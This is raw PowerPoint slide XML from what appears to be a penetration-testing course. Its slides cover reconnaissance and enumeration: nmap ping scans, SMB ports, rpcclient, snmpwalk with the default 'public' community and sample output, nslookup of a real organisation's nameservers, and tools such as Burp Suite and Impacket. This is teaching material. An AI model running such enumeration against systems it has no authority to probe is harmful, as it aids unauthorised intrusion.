        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4793857" y="1283064"/>
          <a:ext cx="1205507" cy="1205507"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">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Application Workflows</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4970399" y="1459606"/>
        <a:ext cx="852423" cy="852423"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F23CEF6E-F172-4847-A088-551C30395A5E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="8100000">
          <a:off x="4601226" y="2316853"/>
          <a:ext cx="321841" cy="406858"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>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683638" y="2364089"/>
        <a:ext cx="225289" cy="244114"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9C04C3E1-4B42-8A49-863D-AF38B68542E9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3512046" y="2564875"/>
          <a:ext cx="1205507" cy="1205507"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">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Automated &amp; Manual Fuzzing/Scanning</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3688588" y="2741417"/>
        <a:ext cx="852423" cy="852423"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="13500000">
          <a:off x="3319414" y="2329735"/>
          <a:ext cx="321841" cy="406858"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>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401826" y="2445243"/>
        <a:ext cx="225289" cy="244114"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{79AFA3FB-0D00-FC4F-8759-DE72FEC7CA6E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2230234" y="1283064"/>
          <a:ext cx="1205507" cy="1205507"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">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Exploiting Vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2406776" y="1459606"/>
        <a:ext cx="852423" cy="852423"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="18900000">
          <a:off x="3306532" y="1047923"/>
          <a:ext cx="321841" cy="406858"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>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320672" y="1163431"/>
        <a:ext cx="225289" cy="24411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EA7955-B8BF-F54D-B052-27F59B5367D3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/1/19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1DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28674214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Hub:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bookmarks list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Old Burp presentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Current presentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239255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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2156487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sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ping scan, does not port scan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2895034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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4031380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Ports 139, 445</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1280618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man page for all available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305496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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2236463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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2111624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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2718963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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284761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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="631413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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2242106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r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmpd.conf</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sysLocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> STRING: "Sitting on the Dock of the Bay"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysContact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> STRING: "Me &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>me@example.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install MIBs and enable names instead of OIDs in returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mibs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-downloader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmp.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Comment out the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mibs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : line and save the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmpwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -c public -v1 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMPv2-MIB::sysDescr.0 = STRING: Linux kali 5.2.0-kali3-amd64 #1 SMP Debian 5.2.17-1kali2 (2019-10-17) x86_64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DISMAN-EVENT-MIB::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysUpTimeInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Timeticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: (81402) 0:13:34.02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMPv2-MIB::sysContact.0 = STRING: Me &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>me@example.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMPv2-MIB::sysName.0 = STRING: kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMPv2-MIB::sysLocation.0 = STRING: Sitting on the Dock of the Bay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMPv2-MIB::sysServices.0 = INTEGER: 72</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SNMPv2-MIB::sysORLastChange.0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Timeticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: (2) 0:00:00.02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317048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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1957597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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3227836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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="672491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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2843551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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="805219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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3741885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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="887893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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2864032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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321708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Burp Suite – proxy tool to modify requests and responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – python tools that can aid with exploits, and enumeration. Standup SMB server in local directory is one example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Katoolin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Will allow easy installation of kali tools on other operating systems – Ubuntu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Raspian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – can also be installed with apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="644316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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2531444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nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; set type=ns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server:		192.168.104.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address:	192.168.104.2#53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-authoritative answer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	nameserver = auth1.dns.cogentco.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	nameserver = ns1.abanet.org.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	nameserver = ns2.abanet.org.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	nameserver = auth4.dns.cogentco.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authoritative answers can be found from:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ns1.abanet.org	internet address = 38.99.228.188</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ns2.abanet.org	internet address = 38.99.228.178</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>auth1.dns.cogentco.com	internet address = 66.28.0.14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
